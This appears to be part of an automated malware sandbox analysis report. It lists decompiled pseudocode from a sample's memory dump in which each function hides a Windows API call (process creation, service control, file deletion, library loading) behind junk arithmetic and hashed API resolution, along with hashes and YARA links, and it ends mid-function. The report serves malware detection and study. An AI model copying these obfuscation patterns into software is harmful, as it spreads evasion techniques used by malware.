CreateProcessW.KERNEL32(?,EDCDBEB4,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 009891EF

Strings

31, xrefs: 0098919F

Memory Dump Source

Source File: 00000002.00000002.576404694.0000000000970000.00000040.00000010.sdmp, Offset: 00970000, based on PE: true

Yara matches

Similarity

API ID: CreateProcess
String ID: 31
API String ID: 963392458-1099231638
Opcode ID: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction ID: 9319e984a3285b9a1091f7078767348e99e31c1b17d980e839091622607e832d
Opcode Fuzzy Hash: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction Fuzzy Hash: 5831D272801259BBCF559FA6CD45CDFBFB5FF89714F108158FA1462120C3728A60EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0097890E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0097890E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t46;
				intOrPtr* _t57;
				void* _t58;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;

				_t68 = __edx;
				_t67 = __ecx;
				E00978002(_t46);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x5a89c2;
				_v12 = 0xac9734;
				_t60 = 0xf;
				_v12 = _v12 / _t60;
				_v12 = _v12 + 0xbff0;
				_v12 = _v12 ^ 0x0000f03b;
				_v20 = 0x5d6235;
				_t61 = 0x58;
				_v20 = _v20 * 0x48;
				_v20 = _v20 ^ 0x1a4c6f32;
				_v8 = 0x1651ff;
				_v8 = _v8 / _t61;
				_v8 = _v8 + 0x3de9;
				_v8 = _v8 | 0x9dbfa52d;
				_v8 = _v8 ^ 0x9dbe342b;
				_v16 = 0xc9b349;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 ^ 0x000d61f6;
				_t57 = E0098E399(_t61, _v8 % _t61, _t61, 0xa2449830, 0x195, 0x5faffbf6);
				_t58 =  *_t57(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0x28, 0, _a20, _a24); // executed
				return _t58;
			}

0x00978919
0x0097891b
0x0097892c
0x00978931
0x00978937
0x0097893e
0x0097894a
0x0097894f
0x00978954
0x0097895b
0x00978962
0x0097896d
0x00978971
0x00978974
0x0097897b
0x0097898c
0x0097898f
0x00978996
0x0097899d
0x009789a4
0x009789ab
0x009789af
0x009789cd
0x009789db
0x009789e2

APIs

SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,?,00000036,00000000,00000036), ref: 009789DB

Strings

5b], xrefs: 00978962

Memory Dump Source

Source File: 00000002.00000002.576404694.0000000000970000.00000040.00000010.sdmp, Offset: 00970000, based on PE: true

Yara matches

Similarity

API ID: FileHandleInformation
String ID: 5b]
API String ID: 3935143524-2683361797
Opcode ID: 63ccbd5bf9bf2d38dd30339ed70447a321936e4e4c5aac198be4ec8ca5f58e68
Instruction ID: b72577a7570d38edd38781b07e7da0159ba00e636e99fda019e2eb54044d0340
Opcode Fuzzy Hash: 63ccbd5bf9bf2d38dd30339ed70447a321936e4e4c5aac198be4ec8ca5f58e68
Instruction Fuzzy Hash: 9B217C75D41208BBDB14DF99CD4AAEEBFB5FF40310F108099E914BB280D7B95B159B90

Uniqueness

Uniqueness Score: -1.00%

Function 0097C38F, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56
serviceCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0097C38F(void* __ecx, int __edx, void* _a4, intOrPtr _a8, short* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t50;
				void* _t59;
				signed int _t61;
				int _t65;

				_push(_a12);
				_t65 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00978002(_t50);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x617f6e;
				_v32 = 0x2c9f69;
				_v12 = 0x3d345c;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 << 1;
				_v12 = _v12 + 0xffff1c15;
				_v12 = _v12 ^ 0xfffbc300;
				_v8 = 0x1d3e99;
				_t61 = 0x3e;
				_v8 = _v8 / _t61;
				_v8 = _v8 + 0xcfea;
				_v8 = _v8 ^ 0x5f2ca55f;
				_v8 = _v8 ^ 0x5f2aa82f;
				_v16 = 0xf71959;
				_v16 = _v16 << 0xa;
				_v16 = _v16 << 0xd;
				_v16 = _v16 ^ 0xac874e69;
				_v20 = 0x5ac786;
				_v20 = _v20 ^ 0xe6acc0dd;
				_v20 = _v20 ^ 0xe6fddbb7;
				E0098E399(_t61, _v8 % _t61, _t61, 0x1f1ae65e, 0x5e, 0x42b99377);
				_t59 = OpenServiceW(_a4, _a12, _t65); // executed
				return _t59;
			}

0x0097c396
0x0097c399
0x0097c39b
0x0097c39e
0x0097c3a1
0x0097c3a3
0x0097c3a8
0x0097c3ae
0x0097c3b2
0x0097c3b9
0x0097c3c0
0x0097c3c7
0x0097c3cb
0x0097c3ce
0x0097c3d5
0x0097c3dc
0x0097c3e8
0x0097c3ee
0x0097c3f1
0x0097c3f8
0x0097c3ff
0x0097c406
0x0097c40d
0x0097c411
0x0097c415
0x0097c41c
0x0097c423
0x0097c42a
0x0097c44a
0x0097c459
0x0097c45f

APIs

OpenServiceW.ADVAPI32(FFFBC300,E6FDDBB7,?,?,?,?,?,?,?,?,00992FF3,?), ref: 0097C459

Strings

\4=, xrefs: 0097C3C0

Memory Dump Source

Source File: 00000002.00000002.576404694.0000000000970000.00000040.00000010.sdmp, Offset: 00970000, based on PE: true

Yara matches

Similarity

API ID: OpenService
String ID: \4=
API String ID: 3098006287-2040901920
Opcode ID: f0bb5145ee7f5cc29076849a53ae227a1e4ca7211b09d7f87376f75b715373d2
Instruction ID: 200f73fa54c9e4e0faed55e7075d556646df0dc42fe981812d7fac9a948c8b5a
Opcode Fuzzy Hash: f0bb5145ee7f5cc29076849a53ae227a1e4ca7211b09d7f87376f75b715373d2
Instruction Fuzzy Hash: BD2132B6D00209EBDB04DFE5C90AADEBBB0FB00324F108189E42566250C3BA5B55DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00984CFD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00984CFD(void* __ecx, long __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, void* _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t46;
				void* _t56;
				signed int _t58;
				long _t62;

				_push(_a20);
				_t62 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00978002(_t46);
				_v20 = 0x7fa37e;
				_v20 = _v20 | 0x057bdedc;
				_v20 = _v20 + 0xffffffcc;
				_v20 = _v20 ^ 0x057d9e34;
				_v8 = 0x65e94f;
				_t58 = 0x2a;
				_v8 = _v8 * 0x5b;
				_v8 = _v8 + 0xffffa5c0;
				_v8 = _v8 / _t58;
				_v8 = _v8 ^ 0x00d22f9e;
				_v16 = 0xf6ef89;
				_v16 = _v16 + 0x478;
				_v16 = _v16 ^ 0x0b24101f;
				_v16 = _v16 ^ 0x0bdb985c;
				_v12 = 0xb9bed2;
				_v12 = _v12 >> 5;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0xb9b7d5de;
				E0098E399(_t58, _v8 % _t58, _t58, 0xa2449830, 0x264, 0x8babc312);
				_t56 = RtlAllocateHeap(_a20, _a4, _t62); // executed
				return _t56;
			}

0x00984d04
0x00984d07
0x00984d09
0x00984d0c
0x00984d0f
0x00984d12
0x00984d15
0x00984d17
0x00984d1c
0x00984d25
0x00984d2c
0x00984d30
0x00984d37
0x00984d44
0x00984d48
0x00984d4b
0x00984d5c
0x00984d5f
0x00984d66
0x00984d6d
0x00984d74
0x00984d7b
0x00984d82
0x00984d89
0x00984d8d
0x00984d91
0x00984daf
0x00984dbe
0x00984dc4

APIs

RtlAllocateHeap.NTDLL(?,B9B7D5DE,?,?,?,?,?,?,?,?,?,?,?), ref: 00984DBE

Strings

Oe, xrefs: 00984D37

Memory Dump Source

Source File: 00000002.00000002.576404694.0000000000970000.00000040.00000010.sdmp, Offset: 00970000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: Oe
API String ID: 1279760036-808228324
Opcode ID: 700dfd9d891cb1a26e26177c6dd2e79faa0fdc2c74feaf985b1bdd3c6d92e912
Instruction ID: e5b46b1b14bb2cea15997b5cc199d6ce49f90eab718fcb2362b995c0a264780b
Opcode Fuzzy Hash: 700dfd9d891cb1a26e26177c6dd2e79faa0fdc2c74feaf985b1bdd3c6d92e912
Instruction Fuzzy Hash: 32211372C01219FBCF14DFA4C94A8DEBFB1FB00364F108588E92466250D7B68B28EF90

Uniqueness

Uniqueness Score: -1.00%

Function 009755C0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E009755C0(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t44;
				int _t56;
				signed int _t58;
				signed int _t59;
				WCHAR* _t65;

				_push(_a4);
				_t65 = __edx;
				_push(__edx);
				E00978002(_t44);
				_v12 = 0xc09d41;
				_t58 = 0x5c;
				_v12 = _v12 / _t58;
				_v12 = _v12 + 0xffffef63;
				_v12 = _v12 ^ 0xe9e279a7;
				_v12 = _v12 ^ 0xe9e62653;
				_v20 = 0xa2cc51;
				_t59 = 0x34;
				_v20 = _v20 / _t59;
				_v20 = _v20 ^ 0x000b7ed2;
				_v8 = 0xd564b1;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 + 0x176e;
				_v8 = _v8 | 0xf1e3b14c;
				_v8 = _v8 ^ 0xf1e4530b;
				_v16 = 0xd8623f;
				_v16 = _v16 * 0x37;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0xe7d235eb;
				E0098E399(_t59, _v20 % _t59, _t59, 0xa2449830, 0x246, 0x6ae2bc6b);
				_t56 = DeleteFileW(_t65); // executed
				return _t56;
			}

0x009755c7
0x009755ca
0x009755cc
0x009755ce
0x009755d3
0x009755e1
0x009755e6
0x009755eb
0x009755f2
0x009755f9
0x00975600
0x0097560a
0x00975610
0x00975613
0x0097561a
0x00975621
0x00975625
0x0097562c
0x00975633
0x0097563a
0x00975655
0x00975658
0x0097565c
0x0097566f
0x00975678
0x0097567e

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00975678

Strings

S&, xrefs: 009755F9

Memory Dump Source

Source File: 00000002.00000002.576404694.0000000000970000.00000040.00000010.sdmp, Offset: 00970000, based on PE: true

Yara matches

Similarity

API ID: DeleteFile
String ID: S&
API String ID: 4033686569-4232605156
Opcode ID: a789b351c44137b8d7dd019b37ab00909fcc494573d4763fe5f2d1bb6bf47882
Instruction ID: f9d861cd5d185e29c6d85fd36bbe47aca77f0fe6e0ebdb12a831627138e2c6f1
Opcode Fuzzy Hash: a789b351c44137b8d7dd019b37ab00909fcc494573d4763fe5f2d1bb6bf47882
Instruction Fuzzy Hash: B2113271D05318BBDB18DFA8C94A8CEBBB4FF90310F108099E429AB290D7B59B15CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0097C460, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0097C460(void* __ecx, void* __edx, void* _a8, void* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t43;
				char _t52;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E00978002(_t43);
				_v12 = 0x266f4b;
				_v12 = _v12 | 0x563deae8;
				_v12 = _v12 * 0x4d;
				_v12 = _v12 ^ 0xf13e188d;
				_v8 = 0xe0e0e3;
				_v8 = _v8 ^ 0x73e6d5d6;
				_v8 = _v8 + 0xffff5e48;
				_v8 = _v8 ^ 0x26d91c35;
				_v8 = _v8 ^ 0x55dbfde5;
				_v20 = 0x5f084f;
				_v20 = _v20 + 0x941e;
				_v20 = _v20 ^ 0xe99bb6cc;
				_v20 = _v20 ^ 0xe9c87fab;
				_v16 = 0x7e37cb;
				_v16 = _v16 + 0xffff5de5;
				_v16 = _v16 << 8;
				_v16 = _v16 ^ 0x7d95e9a6;
				E0098E399(__ecx, __edx, __ecx, 0xa2449830, 0x240, 0x444b06c3);
				_t52 = RtlFreeHeap(_a8, 0, _a12); // executed
				return _t52;
			}

0x0097c466
0x0097c469
0x0097c46c
0x0097c46f
0x0097c472
0x0097c474
0x0097c475
0x0097c476
0x0097c47b
0x0097c485
0x0097c49f
0x0097c4a8
0x0097c4af
0x0097c4b6
0x0097c4bd
0x0097c4c4
0x0097c4cb
0x0097c4d2
0x0097c4d9
0x0097c4e0
0x0097c4e7
0x0097c4ee
0x0097c4f5
0x0097c4fc
0x0097c500
0x0097c514
0x0097c524
0x0097c529

APIs

RtlFreeHeap.NTDLL(7D95E9A6,00000000,E9C87FAB,?,?,?,?,?,?,?,?,?,?,?), ref: 0097C524

Strings

=V, xrefs: 0097C485

Memory Dump Source

Source File: 00000002.00000002.576404694.0000000000970000.00000040.00000010.sdmp, Offset: 00970000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID: =V
API String ID: 3298025750-2236090552
Opcode ID: c09ead993ed459e202f4acc41d47a4f65d5bc2936b677d2f25bc197f5a4c51db
Instruction ID: 96b823136ac1252ad54c3b68121cb48fd2ad1860e5c1f9a813955513a8f4b057
Opcode Fuzzy Hash: c09ead993ed459e202f4acc41d47a4f65d5bc2936b677d2f25bc197f5a4c51db
Instruction Fuzzy Hash: 352114B6C0030DEBCF54DFA4CD46A9EBFB0BB44304F208198E925A6261D3B59B519F85

Uniqueness

Uniqueness Score: -1.00%

Function 00977C11, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44
libraryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00977C11(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t37;
				struct HINSTANCE__* _t44;
				WCHAR* _t47;

				_push(_a8);
				_t47 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00978002(_t37);
				_v16 = 0xc57804;
				_v16 = _v16 + 0x7e2a;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x062dce69;
				_v20 = 0xc0d373;
				_v20 = _v20 ^ 0xd8d0ddee;
				_v20 = _v20 ^ 0xd81819b4;
				_v12 = 0x9f362e;
				_v12 = _v12 + 0xfffffd91;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x000a9d69;
				_v8 = 0xe543a4;
				_v8 = _v8 ^ 0xe0ed073d;
				_v8 = _v8 | 0x93b71955;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0xdfad752a;
				E0098E399(__ecx, __edx, __ecx, 0xa2449830, 0x129, 0xf0e92e19);
				_t44 = LoadLibraryW(_t47); // executed
				return _t44;
			}

0x00977c18
0x00977c1b
0x00977c1d
0x00977c20
0x00977c21
0x00977c22
0x00977c27
0x00977c31
0x00977c38
0x00977c3c
0x00977c43
0x00977c4a
0x00977c51
0x00977c58
0x00977c5f
0x00977c66
0x00977c6a
0x00977c6e
0x00977c75
0x00977c7c
0x00977c83
0x00977c8a
0x00977c8e
0x00977cb1
0x00977cba
0x00977cc0

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 00977CBA

Strings

*~, xrefs: 00977C31

Memory Dump Source

Source File: 00000002.00000002.576404694.0000000000970000.00000040.00000010.sdmp, Offset: 00970000, based on PE: true

Yara matches

Similarity

API ID: LibraryLoad
String ID: *~
API String ID: 1029625771-2567930604
Opcode ID: b9f3b87bebec21f6148c33e759f0ff5f4f2fe9304ffae80c2c21f0ab5745ad8c
Instruction ID: bfe12162b44e91570a124231506f89da2cd8a833f48da1c9417ed8cd485a6159
Opcode Fuzzy Hash: b9f3b87bebec21f6148c33e759f0ff5f4f2fe9304ffae80c2c21f0ab5745ad8c
Instruction Fuzzy Hash: 801122B5D01218BBDF14EFE5C80A4DEBBB4FB00304F108198E826A2251E3B94B18DF80

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9C7D4, Relevance: 3.1, APIs: 2, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6EA9C821

Part of subcall function 6EA9CEAD: InitializeSListHead.KERNEL32(6EADE4A0,6EA9C82B,6EADAF60,00000010,6EA9C7BC,?,?,?,6EA9C9E4,?,00000001,?,?,00000001,?,6EADAFA8), ref: 6EA9CEB2

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6EA9C88B

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 217da8c906ba5633154341e646741d48c4ddf8f2afebe32fa6e31142f64995d8
Instruction ID: 3b4701f42c2bcbe0fdca144e4db7e9f01db1a6ea3c6ae8f35591296e392aa3ea
Opcode Fuzzy Hash: 217da8c906ba5633154341e646741d48c4ddf8f2afebe32fa6e31142f64995d8
Instruction Fuzzy Hash: 0121F3326A8B05AEDF416BF8C6047DC37E59F0A768F148C19D5412F2C1CB2A04C1FA6D

Uniqueness

Uniqueness Score: -1.00%

Function 00980207, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00980207(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t54;
				int _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				WCHAR* _t81;

				_push(_a16);
				_t81 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00978002(_t54);
				_v36 = 0xa7e4f2;
				asm("stosd");
				_t70 = 0x7b;
				asm("stosd");
				asm("stosd");
				_v12 = 0x53fdc4;
				_t71 = 0x5a;
				_v12 = _v12 / _t70;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0xe1fe8b09;
				_v12 = _v12 ^ 0xe1ac8480;
				_v20 = 0x744728;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x239bcee7;
				_v16 = 0xd5199;
				_v16 = _v16 + 0xffff5a50;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x000f59f5;
				_v8 = 0xa57c1a;
				_v8 = _v8 | 0x119c25df;
				_v8 = _v8 + 0xffffdcc6;
				_t72 = 0x4f;
				_v8 = _v8 / _t72;
				_v8 = _v8 ^ 0x003b1570;
				E0098E399(_t72, _v8 % _t72, _t72, 0xa2449830, 0x167, 0xa9a77114);
				_t68 = lstrcmpiW(_a8, _t81); // executed
				return _t68;
			}

0x0098020f
0x00980212
0x00980214
0x00980217
0x0098021a
0x0098021d
0x0098021f
0x00980224
0x00980232
0x00980235
0x00980238
0x00980239
0x0098023a
0x00980246
0x00980247
0x0098024c
0x00980250
0x00980257
0x0098025e
0x00980265
0x00980269
0x00980270
0x00980277
0x00980285
0x0098028a
0x00980291
0x00980298
0x0098029f
0x009802a9
0x009802af
0x009802b2
0x009802d5
0x009802e1
0x009802e8

APIs

lstrcmpiW.KERNEL32(000F59F5,00000000,?,?,?,?,?,?,?,9B842ACC,01B64447,00000000), ref: 009802E1

Strings

(Gt, xrefs: 0098025E

Memory Dump Source

Source File: 00000002.00000002.576404694.0000000000970000.00000040.00000010.sdmp, Offset: 00970000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi
String ID: (Gt
API String ID: 1586166983-558867117
Opcode ID: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction ID: f0c379ac748a7efa4688e36649c9cb7f2f30b9172a8d2160acb97a9bc924db5a
Opcode Fuzzy Hash: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction Fuzzy Hash: 962166B6E00208FBEF04DFA4CC0A9DEBBB2FB84314F10C199E515AA250D7B65A10DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00982D06, Relevance: 1.6, APIs: 1, Instructions: 74
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00982D06(long __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, long _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, long _a40, long _a44) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				intOrPtr _v32;
				void* _t53;
				void* _t66;
				signed int _t68;
				signed int _t69;
				long _t76;

				_push(_a44);
				_t76 = __ecx;
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00978002(_t53);
				_v32 = 0xa61226;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0x8b5566;
				_t68 = 0x4f;
				_v12 = _v12 * 0x16;
				_v12 = _v12 * 0x58;
				_v12 = _v12 ^ 0x1db24b6c;
				_v20 = 0xae8f68;
				_t69 = 0x28;
				_v20 = _v20 / _t68;
				_v20 = _v20 ^ 0x00028d2f;
				_v16 = 0xdc96c3;
				_v16 = _v16 >> 3;
				_v16 = _v16 ^ 0x001086c5;
				_v8 = 0xcc437a;
				_v8 = _v8 << 5;
				_v8 = _v8 / _t69;
				_v8 = _v8 ^ 0x00a46bd6;
				E0098E399(_t69, _v8 % _t69, _t69, 0xa2449830, 0x1b2, 0xa236d704);
				_t66 = CreateFileW(_a8, _t76, _a44, 0, _a16, _a40, 0); // executed
				return _t66;
			}

0x00982d0e
0x00982d13
0x00982d15
0x00982d18
0x00982d1b
0x00982d1c
0x00982d1f
0x00982d22
0x00982d25
0x00982d28
0x00982d29
0x00982d2c
0x00982d30
0x00982d31
0x00982d36
0x00982d3f
0x00982d42
0x00982d45
0x00982d52
0x00982d55
0x00982d5c
0x00982d5f
0x00982d66
0x00982d72
0x00982d73
0x00982d78
0x00982d82
0x00982d89
0x00982d8d
0x00982d94
0x00982d9b
0x00982da9
0x00982dac
0x00982dca
0x00982de1
0x00982de8

APIs

CreateFileW.KERNEL32(001086C5,?,?,00000000,0007BFC3,?,00000000), ref: 00982DE1

Memory Dump Source

Source File: 00000002.00000002.576404694.0000000000970000.00000040.00000010.sdmp, Offset: 00970000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 37d28f26a62827ccb09b71f088429a632209e16a918a5702217c5103877af2d7
Instruction ID: ab600deb412430904e1b0c9856fffd9ed4619d160a73d10a240f514dd6569e76
Opcode Fuzzy Hash: 37d28f26a62827ccb09b71f088429a632209e16a918a5702217c5103877af2d7
Instruction Fuzzy Hash: AE21007290020CBBCF05DFA5CD4A8DEBFB6FB89304F108049F914AA260D7B69A14DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00993231, Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00993231(intOrPtr _a4, int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t51;
				void* _t65;
				signed int _t66;
				signed int _t67;
				signed int _t68;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E00978002(_t51);
				_v20 = 0x8ddd0f;
				_v20 = _v20 ^ 0xe03e86bb;
				_v20 = _v20 + 0xffff1f0e;
				_v20 = _v20 ^ 0xe0b01721;
				_v16 = 0x43c95a;
				_t66 = 3;
				_v16 = _v16 * 0x6c;
				_t67 = 0x1d;
				_v16 = _v16 / _t66;
				_v16 = _v16 ^ 0x0989b3a6;
				_v12 = 0xb34ce2;
				_v12 = _v12 ^ 0x4f195b2f;
				_v12 = _v12 / _t67;
				_v12 = _v12 ^ 0x02b53c02;
				_v8 = 0x60e613;
				_v8 = _v8 + 0xffff76e9;
				_v8 = _v8 + 0xffff1349;
				_t68 = 0x34;
				_v8 = _v8 / _t68;
				_v8 = _v8 ^ 0x000b7b8d;
				E0098E399(_t68, _v8 % _t68, _t68, 0x1f1ae65e, 0x189, 0x1de1df5f);
				_t65 = OpenSCManagerW(0, 0, _a8); // executed
				return _t65;
			}

0x00993238
0x0099323d
0x00993240
0x00993243
0x00993244
0x00993245
0x0099324a
0x00993253
0x0099325a
0x00993261
0x00993268
0x00993275
0x00993278
0x00993280
0x00993281
0x00993286
0x0099328d
0x00993294
0x009932a2
0x009932a7
0x009932ae
0x009932b5
0x009932bc
0x009932c6
0x009932cc
0x009932cf
0x009932f2
0x009932ff
0x00993305

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,0989B3A6,?,?,?,?,?,?,?,9C77B295,?), ref: 009932FF

Memory Dump Source

Source File: 00000002.00000002.576404694.0000000000970000.00000040.00000010.sdmp, Offset: 00970000, based on PE: true

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: a68b103b72432212da7b1a25f69248b8733d1da947c96e5792bd945326fca532
Instruction ID: 66ca35d12030a7f409287799d777887b6a160496683d12bc4c24347f5689d387
Opcode Fuzzy Hash: a68b103b72432212da7b1a25f69248b8733d1da947c96e5792bd945326fca532
Instruction Fuzzy Hash: B6213476E01218FBCB04DFA9C84AADEBFB6FF44310F10C18AE515AA250D7B55B119F80

Uniqueness

Uniqueness Score: -1.00%

Function 00989038, Relevance: 1.6, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00989038(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t53;
				int _t66;
				signed int _t68;
				signed int _t69;
				signed int _t70;

				_push(_a8);
				_push(_a4);
				E00978002(_t53);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0xed3f98;
				_v16 = 0x2a9dca;
				_t68 = 0x79;
				_v16 = _v16 / _t68;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x000f760a;
				_v20 = 0x68a68c;
				_t69 = 0x7f;
				_v20 = _v20 / _t69;
				_v20 = _v20 ^ 0x0005afe9;
				_v8 = 0x320c70;
				_t70 = 0x39;
				_v8 = _v8 / _t70;
				_v8 = _v8 | 0xebb37c35;
				_v8 = _v8 ^ 0x7178f36a;
				_v8 = _v8 ^ 0x9ac8a43f;
				_v12 = 0x21358c;
				_v12 = _v12 << 0xe;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 ^ 0x00063172;
				E0098E399(_t70, _v8 % _t70, _t70, 0xa2449830, 0x35, 0x3485d61b);
				_t66 = FindCloseChangeNotification(_a4); // executed
				return _t66;
			}

0x0098903e
0x00989041
0x00989046
0x0098904b
0x00989051
0x00989055
0x0098905c
0x00989068
0x0098906d
0x00989072
0x00989076
0x0098907d
0x00989087
0x0098908c
0x00989091
0x00989098
0x009890a2
0x009890a8
0x009890ab
0x009890b2
0x009890b9
0x009890c0
0x009890c7
0x009890cb
0x009890cf
0x009890ef
0x009890fa
0x009890ff

APIs

FindCloseChangeNotification.KERNEL32(00063172,?,?,?,?,?,?,?,009909EF), ref: 009890FA

Memory Dump Source

Source File: 00000002.00000002.576404694.0000000000970000.00000040.00000010.sdmp, Offset: 00970000, based on PE: true

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 9411e8551fc63ef0553251f4ae46958ba514df95cf067e6227528f3c3549ca8c
Instruction ID: df2da6773f8edd6cbec97d29de4f0b3ba72ecb1c982f5a931a63ea19b0b5ad35
Opcode Fuzzy Hash: 9411e8551fc63ef0553251f4ae46958ba514df95cf067e6227528f3c3549ca8c
Instruction Fuzzy Hash: 122124B1E0020CEBDF04DFE5C84AADEBBB2EB51304F10C099E514AB250D7B95B559F80

Uniqueness

Uniqueness Score: -1.00%

Function 0097F3F7, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0097F3F7() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t47;

